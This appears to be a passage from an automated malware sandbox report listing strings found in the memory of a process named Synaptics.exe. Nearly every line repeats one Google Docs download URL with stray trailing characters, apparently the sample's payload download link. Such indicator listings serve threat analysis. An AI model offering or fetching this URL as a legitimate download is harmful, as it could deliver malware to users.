                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.0
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.E
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c)
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cY
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gvt2
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.oZ4
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.use
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.x
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.you7
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/E
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/I
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/h
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0B
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0G
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Z
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0fZ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0k
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1638Z
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1K
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1c
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1h
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1j
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1v
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1~
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJT
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKg
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKoZQ
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL1
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLA
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLF
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMJ
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMb
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMg
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMi
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadModel
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMon
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNB7
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNI
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNS
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNh
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNtw
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPv
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQC
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQD
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQO
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQa
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQf
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRR
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadResolV
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSG
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSf
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSm
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSy
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT0
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUI
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUe
